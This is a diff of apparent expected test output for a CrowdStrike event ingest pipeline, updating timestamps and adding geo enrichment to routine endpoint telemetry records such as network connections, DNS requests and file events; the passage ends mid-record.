@@ -1451,7 +1664,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150690400Z", + "ingested": "2021-12-14T14:41:26.533756358Z", "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677512.700\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364796317497854624\",\"RemotePort\":\"443\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4MacV10\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff96f142f6b2475f3c584ddd80\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677512892\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:12.892Z", "kind": "event", @@ -1503,12 +1716,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff7ecf4e61bba14ca5ac5d17b1", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff7ecf4e61bba14ca5ac5d17b1", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:35.806Z", "ecs": { 
@@ -1526,7 +1748,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150696600Z", + "ingested": "2021-12-14T14:41:26.533756760Z", "original": "{\"event_simpleName\":\"DnsRequest\",\"ContextTimeStamp\":\"1625677475.806\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364977197365370629\",\"DomainName\":\"jss.dom1.com\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"DnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-9644-060415b1fd87\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff7ecf4e61bba14ca5ac5d17b1\",\"timestamp\":\"1625677476111\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"28\"}", "created": "2021-07-07T17:04:36.111Z", "kind": "event", @@ -1565,12 +1787,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:04.770Z", "file": { 
@@ -1598,7 +1829,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150702900Z", + "ingested": "2021-12-14T14:41:26.533757218Z", "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677504.770\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"365053504406857894\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9\",\"FileIdentifier\":\"05000001000000000000000000000000b588050000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677540055\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/BitBar/countdown_timer.1s.py\"}", "created": "2021-07-07T17:05:40.055Z", "kind": "event", 
@@ -1621,43 +1852,27 @@ } }, { - "os": { - "type": "linux" - }, - "source": { + "observer": { "geo": { - "continent_name": "Europe", - "country_name": "Denmark", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 10.0, - "lat": 56.0 + "lon": 90.5, + "lat": 27.5 }, - "country_iso_code": "DK" + "country_iso_code": "BT" }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } - }, - "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffffbfbf4ff5aa56a26ad3c1a942", "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffbfbf4ff5aa56a26ad3c1a942", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:05:26.386Z", + "os": { + "type": "linux" + }, "ecs": { "version": "1.12.0" }, 
@@ -1674,8 +1889,21 @@ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, + "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Norway", + "location": { + "lon": 10.0, + "lat": 62.0 + }, + "country_iso_code": "NO" + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, "event": { - "ingested": "2021-12-09T13:36:11.150709200Z", + "ingested": "2021-12-14T14:41:26.533757653Z", "original": "{\"InterfaceIndex\":\"186\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"event_platform\":\"Lin\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1156120155\",\"name\":\"LocalIpAddressRemovedIP6LinV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-b3c1-02ff598b7945\",\"aid\":\"ffffffffbfbf4ff5aa56a26ad3c1a942\",\"timestamp\":\"1625677526386\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:26.386Z", "kind": "state", @@ -1695,7 +1923,13 @@ "name": "LocalIpAddressRemovedIP6LinV1", "ConfigStateHash": "1156120155", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -1714,12 +1948,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff24db47799d1a85aae61dc7bc", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff24db47799d1a85aae61dc7bc", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:59.994Z", "file": { 
@@ -1743,7 +1986,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150715400Z", + "ingested": "2021-12-14T14:41:26.533758056Z", "original": "{\"event_simpleName\":\"DirectoryCreate\",\"ContextTimeStamp\":\"1625677499.994\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053555029062046\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"Flags\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"0\",\"Entitlements\":\"15\",\"name\":\"DirectoryCreateMacV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"VnodeType\":\"2\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff24db47799d1a85aae61dc7bc\",\"TargetDirectoryName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\",\"timestamp\":\"1625677500089\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\"}", "created": "2021-07-07T17:05:00.089Z", "kind": "event", @@ -1782,13 +2025,37 @@ "type": "linux" }, "destination": { - "port": 443, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", + "port": 443, "ip": "67.43.156.13" }, "source": { - "port": 40394, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 40394, "ip": "67.43.156.14" }, "url": { 
@@ -1804,12 +2071,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff58de4e748d9f64c85a9b49e6", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff58de4e748d9f64c85a9b49e6", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:05:17.658Z", "ecs": { @@ -1829,7 +2105,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150721900Z", + "ingested": "2021-12-14T14:41:26.533758736Z", "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"NetworkCloseIP4\",\"ContextTimeStamp\":\"1625677517.658\",\"ConfigStateHash\":\"1479784503\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"84424232977619\",\"RemotePort\":\"443\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"40394\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP4LinV6\",\"id\":\"ffffffff-1111-11eb-9015-02e89cda7d5f\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff58de4e748d9f64c85a9b49e6\",\"RemoteAddressIP4\":\"67.43.156.13\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677517986\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:17.986Z", "kind": "event", 
@@ -1855,30 +2131,33 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", + "type": "agent", + "version": "1007.4.0013701.1" + }, "process": { "entity_id": "365053546767850587", "thread": { "id": 0 } }, + "@timestamp": "2021-07-07T17:04:56.750Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2021-07-07T17:04:56.750Z", "ecs": { "version": "1.12.0" }, 
@@ -1894,7 +2173,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150728200Z", + "ingested": "2021-12-14T14:41:26.533759489Z", "original": "{\"VolumeMediaName\":\"AppleAPFSMedia\",\"VolumeDeviceProtocol\":\"PCI-Express\",\"VolumeDeviceVendor\":\"\",\"ContextThreadId\":\"0\",\"VolumeMediaContent\":\"41504653-0000-11AA-AA11-00306543ECAC\",\"VolumeMediaEjectable\":\"0\",\"aip\":\"67.43.156.14\",\"VolumeAppearanceTime\":\"1625677422.647\",\"VolumeDeviceModel\":\"APPLE SSD SM0256L\",\"VolumeMediaBSDName\":\"disk1s3\",\"VolumeMountPoint\":\"/Volumes/Recovery\",\"event_platform\":\"Mac\",\"VolumeType\":\"APFS\",\"VolumeMediaRemovable\":\"0\",\"VolumeMediaBSDUnit\":\"1\",\"VolumeFileSystemDriver\":\"apfs\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"VolumeMediaSize\":\"250685575168\",\"EffectiveTransmissionClass\":\"2\",\"VolumeBusName\":\"IONVMeController\",\"timestamp\":\"1625677496804\",\"VolumeMediaBSDMinor\":\"8\",\"VolumeMediaWritable\":\"1\",\"event_simpleName\":\"FsVolumeMounted\",\"VolumeDevicePath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1\",\"VolumeName\":\"Recovery\",\"ContextTimeStamp\":\"1625677496.750\",\"VolumeSectorSize\":\"4096\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053546767850587\",\"VolumeBusPath\":\"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController\",\"VolumeDeviceInternal\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"VolumeUUID\":\"85400FAD-01F9-0442-8C5D-441F365D4909\",\"VolumeDeviceRevision\":\"CXS4LA0Q\",\"Entitlements\":\"15\",\"name\":\"FsVolumeMountedMacV1\",\"VolumeMediaBSDMajor\":\"1\",\"VolumeMediaPath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L 
Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"VolumeMediaUUID\":\"AD0F4085-F901-4204-8C5D-441F365D4909\",\"VolumeMediaWhole\":\"0\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", "created": "2021-07-07T17:04:56.804Z", "kind": "event", @@ -1942,32 +2221,36 @@ "VolumeMediaWhole": "0", "cid": "ffffffff15754bcfb5f9152ec7ac90ac", "VolumeIsNetwork": "0" - } - }, - { - "os": { - "type": "linux" - }, - "source": { - "mac": "0e-d6-ff-ff-ff-63", - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "url": { "scheme": "http" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { - "serial_number": "ffffffff190e436aaebc3892bcda5beb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff190e436aaebc3892bcda5beb", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:05:14.374Z", + "os": { + "type": "linux" + }, "ecs": { "version": "1.12.0" }, 
@@ -1982,8 +2265,25 @@ "67.43.156.14" ] }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "mac": "0e-d6-ff-ff-ff-63", + "ip": "67.43.156.14" + }, "event": { - "ingested": "2021-12-09T13:36:11.150734500Z", + "ingested": "2021-12-14T14:41:26.533759908Z", "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677513.841\",\"aip\":\"67.43.156.14\",\"PhysicalAddress\":\"0e-d6-ff-ff-ff-63\",\"InterfaceAlias\":\"eth0\",\"InterfaceIndex\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP4LinV1\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffff190e436aaebc3892bcda5beb\",\"timestamp\":\"1625677514374\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:14.374Z", "kind": "state", 
@@ -2006,46 +2306,36 @@ "PhysicalAddressLength": 6, "InterfaceAlias": "eth0", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } - }, - { - "os": { - "type": "macos" - }, - "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Denmark", - "location": { - "lon": 10.0, - "lat": 56.0 - }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } - }, - "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:40.056Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, 
@@ -2062,8 +2352,21 @@ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, + "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Norway", + "location": { + "lon": 10.0, + "lat": 62.0 + }, + "country_iso_code": "NO" + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, "event": { - "ingested": "2021-12-09T13:36:11.150740700Z", + "ingested": "2021-12-14T14:41:26.533760290Z", "original": "{\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"InterfaceIndex\":\"8\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP6MacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:40.056Z", "kind": "state", 
@@ -2086,47 +2389,36 @@ "name": "LocalIpAddressRemovedIP6MacV1", "EffectiveTransmissionClass": "2", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } - }, - { - "os": { - "type": "macos" - }, - "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Denmark", - "location": { - "lon": 10.0, - "lat": 56.0 - }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } - }, - "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "mac": "c2-27-b0-27-83-0f", - "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { - "serial_number": "ffffffff0ad7494e8e817b3903f4eebb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff0ad7494e8e817b3903f4eebb", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:21.723Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, 
@@ -2143,8 +2435,22 @@ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, + "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Norway", + "location": { + "lon": 10.0, + "lat": 62.0 + }, + "country_iso_code": "NO" + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "mac": "c2-27-b0-27-83-0f", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, "event": { - "ingested": "2021-12-09T13:36:11.150747Z", + "ingested": "2021-12-14T14:41:26.533760675Z", "original": "{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"67.43.156.14\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"llw0\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"8\",\"event_platform\":\"Mac\",\"InterfaceType\":\"6\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"PhysicalAddressLength\":\"6\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521723\",\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1620585913\",\"PhysicalAddress\":\"c2-27-b0-27-83-0f\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP6MacV1\",\"aid\":\"ffffffff0ad7494e8e817b3903f4eebb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.723Z", "kind": "state", @@ -2180,7 +2486,13 @@ "InUcastPkts": "0", "EffectiveTransmissionClass": "2", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -2211,12 +2523,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff23d24c4193ffa6f270775ee5", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff23d24c4193ffa6f270775ee5", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:07.037Z", "ecs": { @@ -2236,7 +2557,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150753300Z", + "ingested": "2021-12-14T14:41:26.533761052Z", "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677507.037\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364432308748445743\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"50647\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4MacV10\",\"id\":\"ffffffff-1111-11eb-8b36-06a8af5164a9\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff23d24c4193ffa6f270775ee5\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677507086\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:07.086Z", "kind": "event", 
@@ -2277,12 +2598,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffa7bf46da689501ce58bd6987", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa7bf46da689501ce58bd6987", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:36.729Z", "file": { @@ -2306,7 +2636,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150759600Z", + "ingested": "2021-12-14T14:41:26.533761448Z", "original": "{\"event_simpleName\":\"ExecutableDeleted\",\"ContextTimeStamp\":\"1625677536.729\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364994904864288322\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ExecutableDeletedMacV1\",\"id\":\"ffffffff-1111-11eb-8ca0-0231588e8cbb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffa7bf46da689501ce58bd6987\",\"timestamp\":\"1625677536784\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt\"}", "created": "2021-07-07T17:05:36.784Z", "kind": "event", 
@@ -2345,12 +2675,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "fffffffffc2c4e4fa9c08e1a8388e5f9", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "fffffffffc2c4e4fa9c08e1a8388e5f9", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:04.542Z", "file": { @@ -2377,7 +2716,7 @@ }, "event": { "action": "GzipFileWritten", - "ingested": "2021-12-09T13:36:11.150766Z", + "ingested": "2021-12-14T14:41:26.533761829Z", "original": "{\"event_simpleName\":\"GzipFileWritten\",\"ContextTimeStamp\":\"1625677504.542\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"362897421906895953\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"04000001000000000000000000000000501f510700000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GzipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9320-06d410e6f705\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffc2c4e4fa9c08e1a8388e5f9\",\"timestamp\":\"1625677504614\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz\"}", "id": "ffffffff-1111-11eb-9320-06d410e6f705", "created": "2021-07-07T17:05:04.614Z" 
@@ -2392,17 +2731,23 @@ }, { "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T01:52:50.595Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -2417,8 +2762,11 @@ "67.43.156.13" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150772300Z", + "ingested": "2021-12-14T14:41:26.533762214Z", "original": 